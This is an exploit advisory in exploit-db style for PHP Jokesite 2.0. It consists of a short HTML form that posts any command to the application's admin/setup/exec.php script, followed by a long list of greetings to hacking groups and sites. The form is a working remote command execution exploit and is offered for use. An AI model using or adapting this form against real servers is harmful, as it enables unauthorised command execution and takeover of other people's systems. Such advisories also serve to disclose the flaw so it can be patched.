======================================================================================== | # Title: PHP Jokesite V 2.0 exec command EXploit | # Author : indoushka | # email: indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug: execcommand ======================Exploit By indoushka ================================= # Exploit: <form action="http://127.0.0.1/php-jokesite_v2/admin/setup/exec.php" method="post"> <input type="hidden" name="action" value="exec"> <table align="center"> <tr> <td>Enter command to exec:</td> </tr> <tr> <td> <textarea name="execcommand" cols="60" rows="3"> </textarea> </td> </tr> <tr> <td><input type="submit" name="go" value="Go"> </td> </tr> </table> </form> Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net ---------------------------------------------------------------------------------------------------------------
体验盒子